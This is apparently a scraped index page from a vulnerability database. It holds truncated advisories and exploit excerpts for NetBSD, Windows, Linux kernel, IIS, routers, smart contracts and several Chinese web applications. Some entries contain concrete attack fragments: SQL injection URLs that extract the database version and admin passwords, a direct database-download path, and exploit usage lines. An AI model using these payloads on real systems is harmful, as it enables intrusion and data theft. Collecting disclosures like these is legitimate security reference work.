NetBSD多个本地信息泄露漏洞

NetBSD是一款开放源代码的操作系统。 NetBSD在返回内核内存到用户空间时缺少过滤，本地攻击者可以利用漏洞获得内核敏感信息。 目前没有详细漏洞细节提供。 NetBSD NetBSD 3.0.1 NetBSD NetBSD 3.0 NetBSD NetBSD 2.1 NetBSD NetBSD 2.0.3 NetBSD NetBSD 2.0.2 NetBSD NetBSD 2.0.1 NetBSD NetBSD 2.0 NetBSD NetBSD Current NetBSD NetBSD 3,1RC1 NetBSD NetBSD 2.1.1 NetBSD NetBSD 2.0.4...

GNU Tar GNUTYPE_NAMES远程目录遍历漏洞

GNU tar可创建和解压tar文档，并进行各种存档文件管理。 GNU tar在处理特定的记录时未能正确处理可能的符号链接，远程攻击者可能利用此漏洞在用户机器的任意位置创建文件。 tar的extract.c文件中的extractarchive函数和mangle.c文件中的extractmangle函数会处理包含有符号链接的GNUTYPENAMES记录类型。如果用户受骗打开了特制的tar文件的话，就会导致覆盖任意文件。 GNU tar 1.16 GNU tar 1.15.1 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Microsoft Windows 2000内核本地权限提升漏洞（MS06-049）

Microsoft Windows是微软发布的非常流行的操作系统。 本地攻击者可以利用Microsoft Windows 2000内核中未检查的缓冲区获得权限提升，完全控制受影响的系统。 Microsoft Windows 2000SP4 Microsoft已经为此发布了一个安全公告（MS06-049）以及相应补丁: MS06-049：Vulnerability in Windows Kernel Could Result in Elevation of Privilege 920958...

Microsoft Outlook Web Access 'owalogon.asp' URL重定向漏洞

Microsoft Exchange Server是一款企业级的邮件服务程序。 Microsoft Outlook Web Access在处理URL时存在问题，远程攻击者可以利用这个漏洞重定向任意URL。 通过构建特殊URL，攻击者可以使用户重定向到任意URL，攻击者利用这个漏洞可以诱使用户访问某个页面，并可能记录密码并发送，或者下载任意文件等。 Microsoft Outlook 2003 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.microsoft.com/technet/security/ Donnie...

MS Windows WebDAV Remote PoC Exploit

No description provided by source. // / IIS 5.0 WebDAV -Proof of concept- / / Bug: CAN-2003-0109 / / By Roman Medina-Heigl Hernandez / / aka RoMaNSoFt [email protected] / / Madrid, 23.Mar.2003 / / ================================= / / Public release. Version 1. / / -------------------------------...

MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)

No description provided by source. !/bin/sh - "exec" "python" "-O" "$0" "$@" doc = """BL4CK - MS06-014 RDS.DataStore - Data Execution CVS-2006-0003 MS06-014 April 2006 this is a bit out-dated, but works very well Usage: ./bl4ckms06014.py http://omfg.what.ho.st/user/stage2.exe index.html Now uploa...

Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit

No description provided by source. // / Local r00t Exploit for: / / Linux Kernel PRCTL Core Dump Handling / / BID 18874 / CVE-2006-2451 / / Kernel 2.6.x = 2.6.13 && 2.6.17.4 / / By: / / - dreyer [email protected] main PoC code / / - RoMaNSoFt [email protected] local root code / / 10.Jul.2006 / //...

Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability

No description provided by source. NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29...

New burnOverflow Bug Identified in Multiple ERC20 Smart Contracts (CVE-2018-11239)

Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities batchOverflow1, proxyOverflow2, transferFlaw3, ownerAnyone4, multiOverflow5. Some of them could be used by attackers to generate tokens out of nowhere while others can be used to...

New multiOverflow Bug Identified in Multiple ERC20 Smart Contracts (CVE-2018-10706)

Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities batchOverflow, proxyOverflow, transferFlaw, ownerAnyone. Some of them could be used by attackers to generate tokens out of nowhere while others can be used to steal tokens from...

DJI Spark hijacking

It is no pleasant experience at all for anyone to get the valuable property bought with the money you have earned with your blood, sweat, and tears stolen by some unknown cybercriminal. The Internet of Things IoT is developing with the rapid pace, and the devices that can be controlled remotely...

CloudMe Unauthenticated Remote Buffer Overflow(CVE-2018-6892)

The following advisory describes one 1 vulnerability found in CloudMe. CloudMe is “a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are...

OpenNMS Java Object Deserialization RCE

! /usr/bin/env python3 Credits: http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/opennms nessus/plugins/opennmsjavaserialize.nasl cobbled together by pancho import socket import sys def buildcmd:...

Asus Unauthenticated LAN Remote Command Execution

Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in AsusWRT Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to LAN remote command execution on any Asus router. AsusWRT is “THE POWERFUL USER-FRIENDLY INTERFACE – The enhanced ASUSWRT...

Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service

Summary We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G LTE wireless communication based LTE router product. Description The router suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario. /lte/lteuicc.shtml: 858:...

libxls read_MSAT Code Execution Vulnerability(CVE-2017-2897)

Summary An exploitable out-of-bounds write vulnerability exists in the readMSAT function of libxls 1.4. A specially crafted XLS file can cause a memory corruption resulting in remote code execution. An attacker can send malicious XLS file to trigger this vulnerability. Tested Versions libxls 1.4...

Microsoft IE11: use-after-free in jscript!JsErrorToString(CVE-2017-11810)

There is a use-after-free in jscript.dll library that can be exploited in IE11. jscript.dll is an old JavaScript library that was used in IE 8 and back. However, IE11 can still load it if put into IE8 compatibility mode and if there is a script tag that can only be understood by the older library...

Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service(CVE-2017-2909)

Summary An infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over network to trigger this vulnerability...

Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution(CVE-2017-2894)

Summary An exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT...

Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities(CVE-2016-2337)

DESCRIPTION Type Confusion exists in canceleval Ruby's TclTkIp class method. Attacker passing different type of object than String as "retval" argument can cause arbitrary code execution. TESTED VERSIONS Ruby 2.3.0 dev Ruby 2.2.2 Tcl/Tk8.6 or later PRODUCT URLs https://www.ruby-lang.org DETAILS...

Microsoft Windows Kernel Local Information Disclosure Vulnerability(CVE-2017-11817)

This tracker entry is a fork of issue 1325, which this bug was reported as a part of. However, as some essential information and context was provided in issue 1325, the "Reported" date was adjusted there to account for it. The new information did not concern the vulnerability discussed here, so w...

Libbpg BGP image decoding Code Execution Vulnerability(CVE-2016-8710)

Summary An exploitable heap write out of bounds vulnerability exists in the decoding of BPG images in libbpg library. A crafted BPG image decoded by libbpg can cause an integer underflow vulnerability causing an out of bounds heap write leading to remote code execution. This vulnerability can be...

WebKit: heap-buffer-overflow in WebCore::RenderSearchField::addSearchResult(CVE-2017-7049)

There is a heap buffer overflow in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= function go i.value = "1"; i.type = "search"; f.submit;...

Microsoft Windows Uniscribe Information Disclosure Vulnerability(CVE-2017-0284)

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ttoGetTableData function, while trying to display text using a corrupted TTF font file: --- 210.274: Access violation - code c0000005 first chance First chance exceptions are reported before any exception handlin...

Apple iOS / MacOS Netagent Kernel Memory Disclosure(CVE-2017-2507)

iOS/MacOS kernel memory disclosure due to lack of bounds checking in netagent socket option handling netagentctlsetopt is the setsockopt handler for netagent control sockets. Options of type NETAGENTOPTIONTYPEREGISTER are handled by netagenthandleregistersetopt. Here's the code: static errnot...

WebKit: UXSS through HTMLObjectElement::updateWidget(CVE-2017-2493)

When an object element loads a JavaScript URLe.g., javascript:alert1, it checks whether it violate the Same Origin Policy or not. Here's some snippets of the logic. void HTMLObjectElement::updateWidgetCreatePlugins createPlugins ... String url = this-url; ... if !allowedToLoadFrameURLurl return;...

Windows Kernel win32k.sys multiple bugs in the NtGdiGetDIBitsInternal system call (CVE-2017-0058)

We have discovered two bugs in the implementation of the win32k!NtGdiGetDIBitsInternal system call, which is a part of the graphic subsystem in all modern versions of Windows. The issues can potentially lead to kernel pool memory disclosure bug 1 or denial of service bug 1 and 2. Under certain...

MacOS/iOS kernel uaf due to bad locking in necp_open (CVE-2017-2478)

necpopen is a syscall used to obtain a new necp file descriptor The necp file's fp's fgdata points to a struct necpfddata allocated on the heap. Here's the relevant code from necpopen: error = fallocp, &fp, &fd, vfscontextcurrent; --------------------- a if error != 0 goto done; if fddata =...

Huawei Flybox B660 Router to bypass authentication vulnerability

Huawei Flybox B660 Router to bypass authentication vulnerability Huawei Flybox B660 Router router device exists to bypass authentication vulnerability. Due to local path"./ htmlcode/html/"module and"indexdefault. asp"file exists vulnerability, a remote unauthenticated attacker could exploit the...

农友政务系统 /ckq/slview.aspx 参数CountryName SQL注入漏洞

No description provided by source...

万户办公OA平台 jigeObj.jsp 参数RecordID SQL注入漏洞

No description provided by source...

惠普打印机设备 HP Color LaserJet 系列未授权访问漏洞

No description provided by source...

极限OA系统 /logincheck.php SQL注入漏洞

No description provided by source...

福建四创灾害预警系统 /Disaster/ReportCount.aspx 文件 tabnm 参数SQL注入漏洞

0x01 框架介绍 四创软件――中国防灾减灾信息与应用服务提供商,是国内企业信息防灾第一人。 影响厂商：福建四创软件有限公司 官方主页：http://www.strongsoft.net 谷歌搜索： intitle:预警 系统 技术支持:福建四创 0x02 漏洞利用 注入链接：/Disaster/ReportCount.aspx?tabnm=1 注入参数：tabnm 【获取数据库版本】 /Disaster/ReportCount.aspx?tabnm=1%27%2bselect+1+where+1=convertint,@@version%2b%27 【管理员账号密码】...

shop7z 商城系统在/Advsearchadmin.asp 处参数kindnum存在SQL注入漏洞

0x01漏洞简介 shop7z商城系统在Advsearchadmin.asp 处的参数kindnum由于过滤不严，存在kindnumSQL注入漏洞。远程攻击者可以利用该漏洞执行任意SQL指令。 0x02漏洞分析 Advsearchadmin.asp代码如下： kindnum=trimrequest"kindnum" pipai=trimrequest"pipai" model=trimrequest"model" productname=trimrequest"productname" price11=trimrequest"price11"...

zTree跨站脚本漏洞

No description provided by source...

Multiple EMC RSA Products ESA-2015-081 Multiple Security Vulnerabilities

受影响的产品： RSA BSAFE Micro Edition Suite MES all 4.1.x versions prior to 4.1.3 RSA BSAFE Micro Edition Suite MES all 4.0.x versions prior to 4.0.8 RSA BSAFE Crypto-C Micro Edition Crypto-C ME 4.1 RSA BSAFE Crypto-C Micro Edition Crypto-C ME all versions prior to 4.0.4 RSA BSAFE Crypto-J all versions...

金蝶销管家逻辑缺陷重置任意用户密码(工作人员账户测试/秒改)

简要描述： 可绕过验证码直接修改用户密码。 详细说明： 0x1:先信息收集一些工作人员的账户用来测试，来证明漏洞的危害性。 13580111111 13752248075 13456231475 13456879564 15578945623 13456231245 13456231245 13648776985 13400002111 13625668852 15018517663 15915533696 13888888888 13456789123 18090700000 13165454756 13654213923 13654213923 13760368754...

阿帕比图书馆系统POST SQL注入

简要描述： 一处SQL注入漏洞 详细说明： 厂商：http://www.apabi.cn 北京方正阿帕比技术有限公司 SQL注入点： /bbs/bbssearch.asp?lang=gb POST:key=1 其中key参数存在SQL注入 Microsoft OLE DB Provider for SQL Server 错误 '80040e14' 第 1 行: '%' 附近有语法错误。 D:\PROGRAM FILES\FOUNDER\DLIBRARY\ROOT\BBS....\Include\ClassBBS.Inc.asp，行 60 互联网自动采集案例5枚：...

Mirapoint /cgi-bin/licenses.cgi 后门漏洞

No description provided by source...

KesionCMS X1 /KS_Data/KesionCMSX1.mdb 数据库发现漏洞

默认的数据库文件在KSData目录下的 KesionCMSX1.mdb，攻击者可以直接下载。漏洞利用过程访问地址http://127.0.0.1/KSData/KesionCMSX1.mdb !/usr/bin/env python coding=utf-8 test: import urllib2 from comm import cmdline from comm import generic pocinfo = 'VulId' : '1503', webvul的ID号 'Name' : 'KesionCMS X1 /KSData/KesionCMSX1.mdb 数据库发现漏洞...

Innovaphone PBX Admin-GUI - CSRF Vulnerability

No description provided by source. Title: Innovaphone PBX Admin-GUI CSRF Impact: High CVSS2 Score: 7.8 AV:N/AC:M/Au:S/C:P/I:C/A:C/E:F/RL:U/RC:C Announced: August 21, 2014 Reporter: Rainer Giedat NSIDE ATTACK LOGIC GmbH, www.nsideattacklogic.de Products: Innovaphone PBX Administration GUI Affected...

XDCMS 3.0.1 /system/modules/xdcms_login.php SQL注入漏洞

No description provided by source...

Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Blender .blend Project Arbitrary Command Execution 1. Advisory Information Title: Blender .blend Project Arbitrary Command Executio...

Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation

No description provided by source. Exploit-DB Note: Vuln still in 6.0.3410 as well as 'Photodex ProShow Gold' Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Photodex ProShow Producer Vendor URL: www.photodex.com Type: Incorrect Default...

MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1)

No description provided by source. source: http://www.securityfocus.com/bid/5556/info Microsoft Windows operating systems use the Server Message Block SMB protocol to support services such as file and printer sharing. A buffer overflow vulnerability has been reporting in the handling of some...

OpenSSL - Remote DoS

No description provided by source. / hoagieopensslrecordofdeath.c OPENSSL REMOTE DENIAL-OF-SERVICE EXPLOIT - OpenSSL 0.9.8m short = 16 bit - OpenSSL 0.9.8f through 0.9.8m short != 16 bit CVE-2010-0740 Bug discovered by: Bodo Moeller and Adam Langley Google Philip Olausson [email protected]...

Max's Image Uploader Shell Upload Vulnerability

PHP F1 Max's Image Uploader 1.0版本的maxImageUpload/index.php中存在无限制文件上传漏洞。 当Apache未被设置来处理具有pjpeg或jpeg扩展名的拟态文件时，远程攻击者可以通过上传具有一个pjpeg或jpeg扩展名的文件，执行任意代码，并借助对original/的一个直接请求来访问该文件。 问题在maxImageUpload.class.php中的 function uploadImage $result = true; if !isset$POST'submitBtn' $this-showUploadForm; else $m...

McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 Path Disclosure Vulnerability

No description provided by source. source : http://www.securityfocus.com/bid/1932/info Cart32 is a shopping cart application for e-commerce enabled sites. Cart32 contains a vulnerability which reveals server information. Requesting a specially crafted URL, by way of the CGI application, will reve...

Dotproject 2.0 /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...